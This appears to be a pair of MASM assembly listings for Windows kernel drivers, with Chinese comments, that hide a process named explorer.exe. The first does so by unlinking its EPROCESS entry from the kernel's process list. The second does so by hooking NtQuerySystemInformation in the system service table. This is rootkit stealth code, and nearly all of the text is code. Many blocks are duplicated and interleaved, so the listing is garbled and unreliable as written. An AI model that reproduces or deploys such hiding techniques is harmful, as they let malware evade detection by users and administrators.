一、
.386
.model flat, stdcall
option casemap:none
.model flat, stdcall
option casemap:none
;**************************************************************************************************
include w2k/ntstatus.inc
include w2k/ntddk.inc
include w2k/ntoskrnl.inc
includelib w2k/ntoskrnl.lib
include Strings.mac
include w2k/ntstatus.inc
include w2k/ntddk.inc
include w2k/ntoskrnl.inc
includelib w2k/ntoskrnl.lib
include Strings.mac
_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP
;**************************************************************************************************
.data
szHide db 'explorer.exe',0
Flink dd ?
Blink dd ?
Explorer dd ?
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP
;**************************************************************************************************
.data
szHide db 'explorer.exe',0
Flink dd ?
Blink dd ?
Explorer dd ?
.const
CCOUNTED_UNICODE_STRING " //Device//devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING " //??//slHideprocess", g_usSymbolicLinkName, 4
;**************************************************************************************************
.code
DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
local dwId,lpEprocess
local ListOffset,NameOffset
local IdOffset
local Version
; int 3
; invoke DbgPrint,$CTA0("/n/nEntry DriverEntry/n/n")
mov status,STATUS_DEVICE_CONFIGURATION_ERROR
CCOUNTED_UNICODE_STRING " //Device//devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING " //??//slHideprocess", g_usSymbolicLinkName, 4
;**************************************************************************************************
.code
DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
local dwId,lpEprocess
local ListOffset,NameOffset
local IdOffset
local Version
; int 3
; invoke DbgPrint,$CTA0("/n/nEntry DriverEntry/n/n")
mov status,STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
.if eax==STATUS_SUCCESS
mov eax,pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset _DriverUnload
assume eax:nothing
;获得得系统版本
invoke PsGetVersion,NULL,addr Version,NULL,NULL
mov eax,Version
cmp eax,0
jne l1
mov ListOffset,0A0h
mov NameOffset,1fch
jmp l2
l1: cmp eax,1
jne exit
mov ListOffset,88h
mov NameOffset,174h
l2: invoke PsGetCurrentProcessId
mov dwId,eax
invoke PsLookupProcessByProcessId,dwId,addr lpEprocess
mov esi,lpEprocess
add esi,ListOffset
mov edi,esi
assume edi:PLIST_ENTRY
assume esi:PLIST_ENTRY
l3: mov edx,[esi].Flink
;比较是否为最后一个EPROCESS
cmp edx,edi
je l4
assume esi:nothing
sub esi,ListOffset
add esi,NameOffset
invoke strcmp,esi,addr szHide
.if eax == 0
sub esi,NameOffset
add esi,ListOffset
mov Explorer,esi
assume esi:PLIST_ENTRY
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;删除节点
mov eax,[esi].Flink
mov ebx,[esi].Blink
mov [ebx].Flink,eax
mov [eax].Blink,ebx
mov Flink,eax
mov Blink,ebx
assume eax:nothing
assume ebx:nothing
invoke DbgPrint,$CTA0("/n/n************hide process successful ***********/n/n")
jmp l4
.endif
;恢复EPROCESS指针
sub esi,NameOffset
add esi,ListOffset
assume esi:PLIST_ENTRY
mov esi,[esi].Flink
jmp l3
l4:
assume esi:nothing
assume edi:nothing
mov status,STATUS_SUCCESS
exit:
.endif
mov eax,status
ret
mov eax,STATUS_DEVICE_CONFIGURATION_ERROR
ret
DriverEntry endp
.if eax==STATUS_SUCCESS
mov eax,pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset _DriverUnload
assume eax:nothing
;获得得系统版本
invoke PsGetVersion,NULL,addr Version,NULL,NULL
mov eax,Version
cmp eax,0
jne l1
mov ListOffset,0A0h
mov NameOffset,1fch
jmp l2
l1: cmp eax,1
jne exit
mov ListOffset,88h
mov NameOffset,174h
l2: invoke PsGetCurrentProcessId
mov dwId,eax
invoke PsLookupProcessByProcessId,dwId,addr lpEprocess
mov esi,lpEprocess
add esi,ListOffset
mov edi,esi
assume edi:PLIST_ENTRY
assume esi:PLIST_ENTRY
l3: mov edx,[esi].Flink
;比较是否为最后一个EPROCESS
cmp edx,edi
je l4
assume esi:nothing
sub esi,ListOffset
add esi,NameOffset
invoke strcmp,esi,addr szHide
.if eax == 0
sub esi,NameOffset
add esi,ListOffset
mov Explorer,esi
assume esi:PLIST_ENTRY
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;删除节点
mov eax,[esi].Flink
mov ebx,[esi].Blink
mov [ebx].Flink,eax
mov [eax].Blink,ebx
mov Flink,eax
mov Blink,ebx
assume eax:nothing
assume ebx:nothing
invoke DbgPrint,$CTA0("/n/n************hide process successful ***********/n/n")
jmp l4
.endif
;恢复EPROCESS指针
sub esi,NameOffset
add esi,ListOffset
assume esi:PLIST_ENTRY
mov esi,[esi].Flink
jmp l3
l4:
assume esi:nothing
assume edi:nothing
mov status,STATUS_SUCCESS
exit:
.endif
mov eax,status
ret
mov eax,STATUS_DEVICE_CONFIGURATION_ERROR
ret
DriverEntry endp
;----------------------------------------------------------------------------------------------------
; D R I V E R U N L O A D
;----------------------------------------------------------------------------------------------------
; D R I V E R U N L O A D
;----------------------------------------------------------------------------------------------------
_DriverUnload proc pDriverObject:PDRIVER_OBJECT
; int 3
; invoke DbgPrint,$CTA0("/n/nEntry DriverUnload/n/n")
pushad
; invoke DbgPrint,$CTA0("/n/nEntry DriverUnload/n/n")
pushad
mov eax,Flink
mov ebx,Explorer
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;恢复被摘除的节点
mov [eax].Blink,ebx
mov [ebx].Flink,eax
mov ebx,Explorer
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;恢复被摘除的节点
mov [eax].Blink,ebx
mov [ebx].Flink,eax
mov eax,Blink
mov [eax].Flink,ebx
mov [ebx].Blink,eax
popad
;清除符号连接
invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
mov eax, pDriverObject
;删除在初始化创建的设备
invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
ret
mov [eax].Flink,ebx
mov [ebx].Blink,eax
popad
;清除符号连接
invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
mov eax, pDriverObject
;删除在初始化创建的设备
invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
ret
_DriverUnload endp
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------
end DriverEntry
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------
end DriverEntry
二、
.386
.model flat, stdcall
option casemap:none
.model flat, stdcall
option casemap:none
;**************************************************************************************************
include w2k/ntstatus.inc
include w2k/ntddk.inc
include w2k/ntoskrnl.inc
include w2k/native.inc
includelib ntoskrnl.lib
include Strings.mac
include w2k/ntstatus.inc
include w2k/ntddk.inc
include w2k/ntoskrnl.inc
include w2k/native.inc
includelib ntoskrnl.lib
include Strings.mac
_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP
;**************************************************************************************************
.data
;保存地址
dwOldNtQuerySystemInformation dd ?
dwAddr dd ?
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP
;**************************************************************************************************
.data
;保存地址
dwOldNtQuerySystemInformation dd ?
dwAddr dd ?
.const
CCOUNTED_UNICODE_STRING " //Device//devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING " //??//slHideprocess", g_usSymbolicLinkName, 4
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4
;**************************************************************************************************
.code
NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return
invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
pushad
test eax,eax
jnz exit
.if SysInfoClass == SystemProcessesAndThreadsInformation
mov esi,lpSysInfo
mov ebx,esi
add esi,[esi]
@@: add esi,38h ;在38h偏移处取得进程名字。
invoke RtlCompareUnicodeString,addr processname, esi, 1
CCOUNTED_UNICODE_STRING " //Device//devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING " //??//slHideprocess", g_usSymbolicLinkName, 4
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4
;**************************************************************************************************
.code
NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return
invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
pushad
test eax,eax
jnz exit
.if SysInfoClass == SystemProcessesAndThreadsInformation
mov esi,lpSysInfo
mov ebx,esi
add esi,[esi]
@@: add esi,38h ;在38h偏移处取得进程名字。
invoke RtlCompareUnicodeString,addr processname, esi, 1
.if eax== 0
invoke DbgPrint, $CTA0("/nsuccessful /n")
.if dword ptr[esi-38h] == 0
mov dword ptr[ebx],0
jmp exit
.else
sub esi,38h
mov edx,[esi]
add [ebx],edx
add esi,[esi]
jmp @B
.endif
.else
sub esi,38h
cmp dword ptr[esi],0
jz exit
mov ebx,esi
add esi,[esi]
jmp @B
.endif
.endif
exit: popad
invoke DbgPrint, $CTA0("/nsuccessful /n")
.if dword ptr[esi-38h] == 0
mov dword ptr[ebx],0
jmp exit
.else
sub esi,38h
mov edx,[esi]
add [ebx],edx
add esi,[esi]
jmp @B
.endif
.else
sub esi,38h
cmp dword ptr[esi],0
jz exit
mov ebx,esi
add esi,[esi]
jmp @B
.endif
.endif
exit: popad
ret
NewNtQuerySystemInformation endp
;----------------------------------------------------------------------------------------------------
; H O O K F U N C
;----------------------------------------------------------------------------------------------------
HookFunction proc
; H O O K F U N C
;----------------------------------------------------------------------------------------------------
HookFunction proc
pushad
; int 3
; invoke DbgPrint, $CTA0("/nEntry into hoookfunction/n")
;下面是用KeServiceDescriptorTabled导出符号获得数组的基地址,这个数组中包含有NtXXXX函数的入口地址。
mov eax, [KeServiceDescriptorTable]
mov esi, [eax]
mov esi, [esi]
;下面五句为获取ZwQuerySystemInformation的地址
mov eax,ZwQuerySystemInformation
inc eax
inc eax
mov eax,[eax]
mov eax,[eax]
inc eax
movzx ecx,byte ptr[eax]
sal ecx,2
add esi,ecx
mov dwAddr,esi
mov edi,dword ptr[esi]
;保存旧的函数地址。
mov dwOldNtQuerySystemInformation,edi
mov edi,offset NewNtQuerySystemInformation
;修改入口地址
cli
mov dword ptr[esi],edi
sti
popad
mov eax, STATUS_SUCCESS
; int 3
; invoke DbgPrint, $CTA0("/nEntry into hoookfunction/n")
;下面是用KeServiceDescriptorTabled导出符号获得数组的基地址,这个数组中包含有NtXXXX函数的入口地址。
mov eax, [KeServiceDescriptorTable]
mov esi, [eax]
mov esi, [esi]
;下面五句为获取ZwQuerySystemInformation的地址
mov eax,ZwQuerySystemInformation
inc eax
inc eax
mov eax,[eax]
mov eax,[eax]
inc eax
movzx ecx,byte ptr[eax]
sal ecx,2
add esi,ecx
mov dwAddr,esi
mov edi,dword ptr[esi]
;保存旧的函数地址。
mov dwOldNtQuerySystemInformation,edi
mov edi,offset NewNtQuerySystemInformation
;修改入口地址
cli
mov dword ptr[esi],edi
sti
popad
mov eax, STATUS_SUCCESS
ret
HookFunction endp
;----------------------------------------------------------------------------------------------------
; DriverUnload
;----------------------------------------------------------------------------------------------------
DriverUnload proc pDriverObject:PDRIVER_OBJECT
;必须保存环境,否则后果很严重。在这个函数中恢复被修改的地址。
pushad
; int 3
; invoke DbgPrint, $CTA0("/nEntry into DriverUnload /n")
mov esi,dwAddr
mov eax,dwOldNtQuerySystemInformation
cli
mov dword ptr[esi],eax
sti
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov eax,pDriverObject
invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
popad
; DriverUnload
;----------------------------------------------------------------------------------------------------
DriverUnload proc pDriverObject:PDRIVER_OBJECT
;必须保存环境,否则后果很严重。在这个函数中恢复被修改的地址。
pushad
; int 3
; invoke DbgPrint, $CTA0("/nEntry into DriverUnload /n")
mov esi,dwAddr
mov eax,dwOldNtQuerySystemInformation
cli
mov dword ptr[esi],eax
sti
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov eax,pDriverObject
invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
popad
ret
DriverUnload endp
;----------------------------------------------------------------------------------------------------
; D R I V E R E N T R Y
;----------------------------------------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
; D R I V E R E N T R Y
;----------------------------------------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
; int 3
; invoke DbgPrint, $CTA0("/nEntry into DriverEntry/n")
mov status, STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
invoke HookFunction
mov status, STATUS_SUCCESS
.endif
mov eax, status
; invoke DbgPrint, $CTA0("/nEntry into DriverEntry/n")
mov status, STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
invoke HookFunction
mov status, STATUS_SUCCESS
.endif
mov eax, status
ret
DriverEntry endp
end DriverEntry